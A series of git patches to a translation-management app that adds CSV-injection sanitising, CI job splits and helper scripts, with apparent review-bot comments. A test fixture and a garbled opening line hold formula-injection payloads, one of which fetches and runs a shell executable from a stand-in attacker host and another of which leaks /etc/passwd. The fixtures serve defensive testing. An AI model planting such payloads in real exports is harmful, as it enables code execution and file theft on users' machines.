SUM()*cmd|' calc'!A,second 0+cmd|' calc'!A0,third cmd|' notepad'!'A',fourth cmd|' powershell IEX(wget attacker_servershell)'!A,fifth -cmd|'c rundll \\.0.0.1\\3\\2\\10'!_xlbgnm.A1,sixth -HYPERLINK(CONCATENATE("http:/.0.0.0:0/.txt?v=" ('file:///etc/passwd'#$passwd.A1)); "testpoc"),seventh +HYPERLINK(CONCATENATE("http:/.0.0.0:0/.txt?v=" ('file:///etc/passwd'#$passwd.A1)); "testpoc"),sixth diff --git a/api/src/formatters/fixtures/index.ts b/api/src/formatters/fixtures/index.ts index 945561a9..9fb08dd8 100644 --- a/api/src/formatters/fixtures/index.ts +++ b/api/src/formatters/fixtures/index.ts 
@@ -48,13 +48,9 @@ export const riskyPayloads: IntermediateTranslationFormat = { term: `=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0`, translation: `fifth`, }, - { - term: `=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1`, - translation: `sixth`, - }, { term: `=HYPERLINK(CONCATENATE("http://0.0.0.0:80/123.txt?v="; ('file:///etc/passwd'#$passwd.A1));"test-poc")`, - translation: `seventh`, + translation: `sixth`, }, ], }; diff --git a/yarn.lock b/yarn.lock index eb54ab19..a2624825 100644 --- a/yarn.lock +++ b/yarn.lock @@ -17299,17 +17299,17 @@ svgo@^2.3.0: csso "^4.2.0" stable "^0.1.8" -swagger-ui-dist@^3.18.1: - version "3.52.3" - resolved "https://registry.yarnpkg.com/swagger-ui-dist/-/swagger-ui-dist-3.52.3.tgz#a09b5cdccac69e3f5f1cbd258654a110119a7f0e" - integrity sha512-7QSY4milmYx5O8dbzU5tTftiaoZt+4JGxahTTBiLAnbTvhTyzum9rsjDIJjC+xeT8Tt1KfB38UuQQjmrh2THDQ== +swagger-ui-dist@>=4.1.3: + version "4.4.0" + resolved "https://registry.yarnpkg.com/swagger-ui-dist/-/swagger-ui-dist-4.4.0.tgz#4ffdc152a8fd8c1c115ad20b875d1f713f65e08f" + integrity sha512-oxTuL0NxBP61fYHN6VC7b+FB3UbLTBEuO04S2H2D5s4zvqsf0hRRXgZRdPTZ76UoTybeqIF5FNlR6PdYie9Uug== -swagger-ui-express@^4.1.6: - version "4.1.6" - resolved "https://registry.yarnpkg.com/swagger-ui-express/-/swagger-ui-express-4.1.6.tgz#682294af3d5c70f74a1fa4d6a9b503a9ee55ea82" - integrity sha512-Xs2BGGudvDBtL7RXcYtNvHsFtP1DBFPMJFRxHe5ez/VG/rzVOEjazJOOSc/kSCyxreCTKfJrII6MJlL9a6t8vw== +swagger-ui-express@^4.2.0: + version "4.3.0" + resolved "https://registry.yarnpkg.com/swagger-ui-express/-/swagger-ui-express-4.3.0.tgz#226238ab231f7718f9109d63a66efc3a795618dd" + integrity sha512-jN46SEEe9EoXa3ZgZoKgnSF6z0w3tnM1yqhO4Y+Q4iZVc8JOQB960EZpIAz6rNROrDApVDwcMHR0mhlnc/5Omw== dependencies: - swagger-ui-dist "^3.18.1" + swagger-ui-dist ">=4.1.3" symbol-observable@4.0.0: version "4.0.0" From a0b99c0942bb4703fce080f7a896fc4bc15bd060 Mon Sep 17 00:00:00 2001 
From: Ruslan Konviser Date: Sat, 29 Jan 2022 00:10:45 +0200 Subject: [PATCH 17/25] fix: formatting with prettier --- api/src/formatters/csv.ts | 20 +++++++++----------- 1 file changed, 9 insertions(+), 11 deletions(-) diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index d84eaf4b..41309f6c 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -1,5 +1,5 @@ // Copyright (c) 2021-2022 Ever Co. LTD -// Modified code from https://github.com/destromas1/csv-injection-protector +// Modified code from https://github.com/destromas1/csv-injection-protector // Originally MIT Licensed // - see https://github.com/destromas1/csv-injection-protector/blob/master/LICENSE // - original code `Copyright (c) 2019 Shahjada Talukdar`; @@ -36,31 +36,29 @@ export const csvParser: Parser = async (data: string) => { }; const csvInjectionProtector = (str: string) => { - - const riskyChars = ["=", "+", "-", "@", ",", ";", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0x0d", "/C", ".exe", "\\", "/", ".dll"]; - if(!str) return ""; + const riskyChars = ['=', '+', '-', '@', ',', ';', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0x0d', '/C', '.exe', '\\', '/', '.dll']; + if (!str) return ''; riskyChars.map(risk => { - if(str.includes(risk)){ - return str = str.replace(risk, ""); + if (str.includes(risk)) { + return (str = str.replace(risk, '')); } }); return str; -} +}; export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) => { - const clearedTranslations = []; data.translations.map(trans => { const protectedTranslation = { term: csvInjectionProtector(trans.term), - translation: csvInjectionProtector(trans.translation) - } + translation: csvInjectionProtector(trans.translation), + }; clearedTranslations.push(protectedTranslation); }); const rows = await streamAsPromise( - stringify((clearedTranslations), { + stringify(clearedTranslations, { header: false, }), ); 
From 4d0e0eaed9edd9f03aca3f2a4cdf3dd212e078ec Mon Sep 17 00:00:00 2001 From: RAHUL RATHORE Date: Sat, 29 Jan 2022 13:34:09 +0530 Subject: [PATCH 18/25] fix: csv injection matching with first character of csv cell --- api/src/formatters/csv.ts | 53 ++++++++++++++------------ api/src/formatters/fixtures/simple.csv | 2 +- 2 files changed, 30 insertions(+), 25 deletions(-) diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index 41309f6c..494f2b39 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -6,7 +6,7 @@ import * as parse from 'csv-parse'; import * as stringify from 'csv-stringify'; -import { Exporter, IntermediateTranslationFormat, Parser } from '../domain/formatters'; +import { Exporter, IntermediateTranslation, IntermediateTranslationFormat, Parser } from '../domain/formatters'; const streamAsPromise = stream => { const result = []; 
@@ -35,32 +35,37 @@ export const csvParser: Parser = async (data: string) => { }; }; +/** + * CSV Injection – A Guide To Protecting Your CSV Files + * + * @param str + * @returns + */ const csvInjectionProtector = (str: string) => { - const riskyChars = ['=', '+', '-', '@', ',', ';', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0x0d', '/C', '.exe', '\\', '/', '.dll']; - if (!str) return ''; + const riskyChars = ['=', '+', '-', '@', ',', ';', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0x0d', '/C', '.exe', '\\', '/', '.dll']; + if (!str) return ''; - riskyChars.map(risk => { - if (str.includes(risk)) { - return (str = str.replace(risk, '')); - } - }); - - return str; + /** + * Check first character of string + */ + if (riskyChars.includes(str.charAt(0))) { + return (str = str.replace(str.charAt(0), '')); + } + return str; }; export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) => { - const clearedTranslations = []; - data.translations.map(trans => { - const protectedTranslation = { - term: csvInjectionProtector(trans.term), - translation: csvInjectionProtector(trans.translation), - }; - clearedTranslations.push(protectedTranslation); - }); - const rows = await streamAsPromise( - stringify(clearedTranslations, { - header: false, - }), - ); - return rows.join(''); + const clearedTranslations = data.translations.map((trans: IntermediateTranslation) => { + return { + term: csvInjectionProtector(trans.term), + translation: csvInjectionProtector(trans.translation), + }; + }); + + const rows = await streamAsPromise( + stringify(clearedTranslations, { + header: false, + }), + ); + return rows.join(''); }; diff --git a/api/src/formatters/fixtures/simple.csv b/api/src/formatters/fixtures/simple.csv index 91c9904d..e8d34c6d 100644 --- a/api/src/formatters/fixtures/simple.csv +++ b/api/src/formatters/fixtures/simple.csv 
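Review bot: The new guard removes only one leading character, so a cell that starts with two trigger characters still starts with one after `csvInjectionProtector` runs, and the `'0x0d'`, `'/C'`, `'.exe'` and `'.dll'` entries can never equal `str.charAt(0)` because they are longer than one character. The list also omits a leading tab or carriage return, which the OWASP CSV-injection guidance names alongside `=`, `+`, `-` and `@`, while the digit, `,` and `;` entries strip the first character of ordinary values such as a translation that starts with a number. Consider `return str.replace(/^[=+\-@\t\r]+/, '');`, or, to keep the text intact, prefixing the cell with `'` as OWASP recommends instead of deleting characters. The docblock's `@param str` and `@returns` are empty; state there that only the start of the value is examined and that an empty value yields `''`.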
@@ -1,4 +1,4 @@ term.one,Current Plan: {{ project.plan.name }} term two,"{VAR_PLURAL, plural, =0 {locales} =1 {locale} other {locales} }" TERM_THREE,Export format... -term:four,hello there you\nthis should be in a newline +term:four,hello there you\nthis should be in a newline \ No newline at end of file From 682e24f3718599f482bbf9980ec2aa663c5da52b Mon Sep 17 00:00:00 2001 From: RAHUL RATHORE Date: Sat, 29 Jan 2022 13:42:52 +0530 Subject: [PATCH 19/25] fix: formatting using Prettier --- api/src/formatters/csv.ts | 50 +++++++++++++++++++-------------------- 1 file changed, 25 insertions(+), 25 deletions(-) diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index 494f2b39..bb6f85c1 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts 
@@ -37,35 +37,35 @@ export const csvParser: Parser = async (data: string) => { /** * CSV Injection – A Guide To Protecting Your CSV Files - * - * @param str - * @returns + * + * @param str + * @returns */ const csvInjectionProtector = (str: string) => { - const riskyChars = ['=', '+', '-', '@', ',', ';', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0x0d', '/C', '.exe', '\\', '/', '.dll']; - if (!str) return ''; + const riskyChars = ['=', '+', '-', '@', ',', ';', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0x0d', '/C', '.exe', '\\', '/', '.dll']; + if (!str) return ''; - /** - * Check first character of string - */ - if (riskyChars.includes(str.charAt(0))) { - return (str = str.replace(str.charAt(0), '')); - } - return str; + /** + * Check first character of string + */ + if (riskyChars.includes(str.charAt(0))) { + return (str = str.replace(str.charAt(0), '')); + } + return str; }; export const csvExporter: Exporter = async (data: IntermediateTranslationFormat) => { - const clearedTranslations = data.translations.map((trans: IntermediateTranslation) => { - return { - term: csvInjectionProtector(trans.term), - translation: csvInjectionProtector(trans.translation), - }; - }); - - const rows = await streamAsPromise( - stringify(clearedTranslations, { - header: false, - }), - ); - return rows.join(''); + const clearedTranslations = data.translations.map((trans: IntermediateTranslation) => { + return { + term: csvInjectionProtector(trans.term), + translation: csvInjectionProtector(trans.translation), + }; + }); + + const rows = await streamAsPromise( + stringify(clearedTranslations, { + header: false, + }), + ); + return rows.join(''); }; From 5eb53f0fe4b731a6f9f3e79d0c2cc479a4c57776 Mon Sep 17 00:00:00 2001 From: RAHUL RATHORE Date: Sat, 29 Jan 2022 13:44:15 +0530 Subject: [PATCH 20/25] fix: deepscan --- api/src/formatters/csv.ts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/api/src/formatters/csv.ts b/api/src/formatters/csv.ts index bb6f85c1..a4878a36 100644 --- a/api/src/formatters/csv.ts +++ b/api/src/formatters/csv.ts @@ -49,7 +49,7 @@ const csvInjectionProtector = (str: string) => { * Check first character of string */ if (riskyChars.includes(str.charAt(0))) { - return (str = str.replace(str.charAt(0), '')); + return str.replace(str.charAt(0), ''); } return str; }; From 3fa3a106c2281849448d517ced5cb07daca47a1b Mon Sep 17 00:00:00 2001 From: Ruslan Konviser Date: Sat, 29 Jan 2022 14:09:22 +0200 Subject: [PATCH 21/25] feat: split unit and e2e tests as separate jobs --- .circleci/config.yml | 83 +++++++++++++++++++++++++++++++++++++++++--- bin/check_lint.sh | 34 ++++++++++++++++++ bin/test_e2e.sh | 28 +++++++++++++++ bin/test_unit.sh | 28 +++++++++++++++ 4 files changed, 169 insertions(+), 4 deletions(-) create mode 100644 bin/check_lint.sh create mode 100644 bin/test_e2e.sh create mode 100644 bin/test_unit.sh diff --git a/.circleci/config.yml b/.circleci/config.yml index 9002c658..65c7fc8e 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -1,7 +1,32 @@ version: 2 jobs: - test: + check_lint: + working_directory: ~/workspace + docker: + - image: circleci/node:14.16 + steps: + - checkout + - restore_cache: + keys: + - api-deps-{{ checksum "api/yarn.lock" }} + - webapp-deps-{{ checksum "webapp/yarn.lock" }} + - run: + name: Install deps + command: bin/install-deps.sh + - save_cache: + paths: + - ~/workspace/api/node_modules + key: api-deps-{{ checksum "api/yarn.lock" }} + - save_cache: + paths: + - ~/workspace/webapp/node_modules + key: webapp-deps-{{ checksum "webapp/yarn.lock" }} + - run: + name: Run Lint checks + command: bin/check_lint.sh + + test_unit: working_directory: ~/workspace docker: - image: circleci/node:14.16 
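Review bot: The `restore_cache` step added to `check_lint` lists both `api-deps-…` and `webapp-deps-…` under a single `keys:` list, but CircleCI restores only the first key that matches, so once an API cache exists the webapp `node_modules` cache is never restored. Use one `restore_cache` step per cache, each with its own single key, mirroring the two `save_cache` steps that follow it. The `test_e2e` job added in the next hunk repeats the same step and needs the same split.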
@@ -31,7 +56,39 @@ jobs: command: dockerize -wait tcp://127.0.0.1:3306 -timeout 120s - run: name: Run tests and checks - command: bin/check.sh + command: bin/test_unit.sh + + test_e2e: + working_directory: ~/workspace + docker: + - image: circleci/node:14.16 + - image: mysql:5.7 + environment: + MYSQL_ALLOW_EMPTY_PASSWORD: "yes" + MYSQL_DATABASE: "tr_e2e" + steps: + - checkout + - restore_cache: + keys: + - api-deps-{{ checksum "api/yarn.lock" }} + - webapp-deps-{{ checksum "webapp/yarn.lock" }} + - run: + name: Install deps + command: bin/install-deps.sh + - save_cache: + paths: + - ~/workspace/api/node_modules + key: api-deps-{{ checksum "api/yarn.lock" }} + - save_cache: + paths: + - ~/workspace/webapp/node_modules + key: webapp-deps-{{ checksum "webapp/yarn.lock" }} + - run: + name: Wait for DB + command: dockerize -wait tcp://127.0.0.1:3306 -timeout 120s + - run: + name: Run tests and checks + command: bin/test_e2e.sh build: docker: @@ -51,7 +108,23 @@ workflows: - test release: jobs: - - test: + - check_lint: + filters: + branches: + ignore: /.*/ + tags: + only: /^([0-9.]+)$/ + - test_unit: + requires: + - check_lint + filters: + branches: + ignore: /.*/ + tags: + only: /^([0-9.]+)$/ + - test_e2e: + requires: + - check_lint filters: branches: ignore: /.*/ @@ -60,7 +133,9 @@ workflows: - build: context: traduora requires: - - test + - check_lint + - test_unit + - test_e2e filters: branches: ignore: /.*/ diff --git a/bin/check_lint.sh b/bin/check_lint.sh new file mode 100644 index 00000000..eea28b5c --- /dev/null +++ b/bin/check_lint.sh 
@@ -0,0 +1,34 @@
+#!/bin/bash
+
+set -e
+
+export TERM=xterm
+
+function pprint() {
+ local s=("$@") b w
+ for l in "${s[@]}"; do
+ ((w<${#l})) && { b="$l"; w="${#l}"; }
+ done
+ tput setaf 3
+ echo "-${b//?/-}-"
+ for l in "${s[@]}"; do
+ printf '%s%*s%s\n' "$(tput setaf 2)" "-$w" "$l"
+ done
+ tput setaf 3
+ echo "-${b//?/-}-"
+ tput sgr 0
+}
+
+pprint "Installing dependencies if needed"
+bin/install-deps.sh
+
+pprint "Check code format"
+yarn check-fmt
+
+pprint "Linting API code"
+cd api && yarn lint
+
+pprint "Linting webapp code"
+cd ../webapp && yarn lint
+
+pprint "All Linting checks passed!"
diff --git a/bin/test_e2e.sh b/bin/test_e2e.sh
new file mode 100644
index 00000000..f0dffb3c
--- /dev/null
+++ b/bin/test_e2e.sh
@@ -0,0 +1,28 @@
+#!/bin/bash
+
+set -e
+
+export TERM=xterm
+
+function pprint() {
+ local s=("$@") b w
+ for l in "${s[@]}"; do
+ ((w<${#l})) && { b="$l"; w="${#l}"; }
+ done
+ tput setaf 3
+ echo "-${b//?/-}-"
+ for l in "${s[@]}"; do
+ printf '%s%*s%s\n' "$(tput setaf 2)" "-$w" "$l"
+ done
+ tput setaf 3
+ echo "-${b//?/-}-"
+ tput sgr 0
+}
+
+pprint "Installing dependencies if needed"
+bin/install-deps.sh
+
+pprint "Running e2e tests" "Ensure you are running a local MySQL with a database called 'tr_e2e'"
+cd api && yarn test:e2e
+
+pprint "All e2e tests passed!"
diff --git a/bin/test_unit.sh b/bin/test_unit.sh
new file mode 100644
index 00000000..fe7a6e1f
--- /dev/null
+++ b/bin/test_unit.sh
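Review bot: `pprint` is pasted verbatim into all three new scripts (`bin/check_lint.sh`, `bin/test_e2e.sh`, `bin/test_unit.sh`), so any later fix to it has to be made three times. Keep one copy in a shared helper under `bin/` and load it from each script with `source "$(dirname "$0")/<shared-helper>.sh"`. The scripts also call `bin/install-deps.sh` and `cd api` relative to the caller's working directory, so they only work when started from the repository root; adding `cd "$(dirname "$0")/.."` right after `set -e` removes that dependency.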
@@ -0,0 +1,28 @@ +#!/bin/bash + +set -e + +export TERM=xterm + +function pprint() { + local s=("$@") b w + for l in "${s[@]}"; do + ((w<${#l})) && { b="$l"; w="${#l}"; } + done + tput setaf 3 + echo "-${b//?/-}-" + for l in "${s[@]}"; do + printf '%s%*s%s\n' "$(tput setaf 2)" "-$w" "$l" + done + tput setaf 3 + echo "-${b//?/-}-" + tput sgr 0 +} + +pprint "Installing dependencies if needed" +bin/install-deps.sh + +pprint "Running Unit Tests" "Ensure you are running a local MySQL with a database called 'tr_e2e'" +cd api && yarn test + +pprint "All Unit Tests passed!" From a7169e00f50eb8d9c3ef1255663ad62d6794dbbf Mon Sep 17 00:00:00 2001 From: Ruslan Konviser Date: Sat, 29 Jan 2022 14:11:19 +0200 Subject: [PATCH 22/25] fix: ops --- .circleci/config.yml | 23 ++++++++++++++++++++++- 1 file changed, 22 insertions(+), 1 deletion(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index 65c7fc8e..2aa0102f 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -105,7 +105,28 @@ workflows: version: 2 test: jobs: - - test + - check_lint: + filters: + branches: + ignore: /.*/ + tags: + only: /^([0-9.]+)$/ + - test_unit: + requires: + - check_lint + filters: + branches: + ignore: /.*/ + tags: + only: /^([0-9.]+)$/ + - test_e2e: + requires: + - check_lint + filters: + branches: + ignore: /.*/ + tags: + only: /^([0-9.]+)$/ release: jobs: - check_lint: From 6b197578f4ce73d4e62fc1dee2034e8b323c2722 Mon Sep 17 00:00:00 2001 From: Ruslan Konviser Date: Sat, 29 Jan 2022 14:19:50 +0200 Subject: [PATCH 23/25] feat: update Circle to use Orbs --- .circleci/config.yml | 29 ++++++++++++++++++++++++----- 1 file changed, 24 insertions(+), 5 deletions(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index 2aa0102f..9a736c58 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml 
@@ -1,12 +1,19 @@ -version: 2 +version: 2.1 + +orbs: + node: circleci/node@5.0.0 jobs: check_lint: working_directory: ~/workspace docker: - - image: circleci/node:14.16 + - image: 'cimg/base:stable' steps: - checkout + - node/install: + install-yarn: true + node-version: '16.13' + - run: node --version - restore_cache: keys: - api-deps-{{ checksum "api/yarn.lock" }} @@ -29,13 +36,17 @@ jobs: test_unit: working_directory: ~/workspace docker: - - image: circleci/node:14.16 + - image: 'cimg/base:stable' - image: mysql:5.7 environment: MYSQL_ALLOW_EMPTY_PASSWORD: "yes" MYSQL_DATABASE: "tr_e2e" steps: - checkout + - node/install: + install-yarn: true + node-version: '16.13' + - run: node --version - restore_cache: keys: - api-deps-{{ checksum "api/yarn.lock" }} @@ -61,13 +72,17 @@ jobs: test_e2e: working_directory: ~/workspace docker: - - image: circleci/node:14.16 + - image: 'cimg/base:stable' - image: mysql:5.7 environment: MYSQL_ALLOW_EMPTY_PASSWORD: "yes" MYSQL_DATABASE: "tr_e2e" steps: - checkout + - node/install: + install-yarn: true + node-version: '16.13' + - run: node --version - restore_cache: keys: - api-deps-{{ checksum "api/yarn.lock" }} @@ -92,9 +107,13 @@ jobs: build: docker: - - image: circleci/node:14.16 + - image: 'cimg/base:stable' steps: - checkout + - node/install: + install-yarn: true + node-version: '16.13' + - run: node --version - setup_remote_docker - run: name: Build From 8b71dc7a91b95ca745c6dd59be1ff33e0d294320 Mon Sep 17 00:00:00 2001 From: Ruslan Konviser Date: Sat, 29 Jan 2022 14:26:29 +0200 Subject: [PATCH 24/25] fix: run tests in feature branches too --- .circleci/config.yml | 19 +++---------------- 1 file changed, 3 insertions(+), 16 deletions(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index 9a736c58..9da1db34 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml 
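Review bot: Every job now runs on `cimg/base:stable`, a moving tag, and that includes `build`, which the release workflow runs with `context: traduora` (presumably holding credentials) and `setup_remote_docker`; whatever the tag resolves to at run time executes in the release path. Pin the executor to a dated tag or a digest, e.g. `- image: 'cimg/base:<dated-tag>@sha256:<digest>'`, and consider doing the same for `mysql:5.7` in `test_unit` and `test_e2e`. The orb is already pinned as `circleci/node@5.0.0`, which is the pattern to follow for the images. The change from Node 14.16 to `node-version: '16.13'` rides along in all four hunks and deserves a line in the commit message.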
@@ -122,30 +122,17 @@ jobs: workflows: version: 2 + test: jobs: - - check_lint: - filters: - branches: - ignore: /.*/ - tags: - only: /^([0-9.]+)$/ + - check_lint - test_unit: requires: - check_lint - filters: - branches: - ignore: /.*/ - tags: - only: /^([0-9.]+)$/ - test_e2e: requires: - check_lint - filters: - branches: - ignore: /.*/ - tags: - only: /^([0-9.]+)$/ + release: jobs: - check_lint: From 452b9c674a1da2c7ff7e860bc5d319ad482eb49c Mon Sep 17 00:00:00 2001 From: Ruslan Konviser Date: Sat, 29 Jan 2022 14:34:30 +0200 Subject: [PATCH 25/25] fix: scripts permissions --- bin/check_lint.sh | 0 bin/test_e2e.sh | 0 bin/test_unit.sh | 0 3 files changed, 0 insertions(+), 0 deletions(-) mode change 100644 => 100755 bin/check_lint.sh mode change 100644 => 100755 bin/test_e2e.sh mode change 100644 => 100755 bin/test_unit.sh diff --git a/bin/check_lint.sh b/bin/check_lint.sh old mode 100644 new mode 100755 diff --git a/bin/test_e2e.sh b/bin/test_e2e.sh old mode 100644 new mode 100755 diff --git a/bin/test_unit.sh b/bin/test_unit.sh old mode 100644 new mode 100755